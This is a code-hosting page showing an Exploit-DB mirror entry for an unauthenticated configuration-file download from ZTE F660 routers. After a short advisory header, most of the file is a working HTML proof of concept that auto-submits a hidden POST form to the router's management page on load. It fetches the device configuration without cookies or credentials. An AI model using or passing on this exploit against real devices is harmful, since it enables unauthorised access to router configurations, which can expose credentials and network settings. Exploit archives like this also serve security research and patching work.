bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/36978.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

26 lines
No EOL
816 B
Text
Raw Permalink Blame History

/*
Exploit Title : ZTE remote configuration download
Date : 09 May 2015
Exploit Author : Daniel Cisa
Vendor Homepage : http://wwwen.zte.com.cn/en/
Platform : Hardware
Tested On : ZTE F660
Firmware Version: 2.22.21P1T8S
--------------------------
Config remote download
--------------------------
ZTE F660 Embedded Software does not check Cookies And Credentials on POST
method so
attackers could download the config file with this post method without
authentication.
*/
<html>
<body onload="document.fDownload.submit();">
<form name="fDownload" method="POST" action="
http://192.168.1.1/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch"
enctype="multipart/form-data" onsubmit="return false;">
Request Sent....
<input type="hidden" name="config" id="config" value="">
</body>
</html>
Reference in a new issue View git blame Copy permalink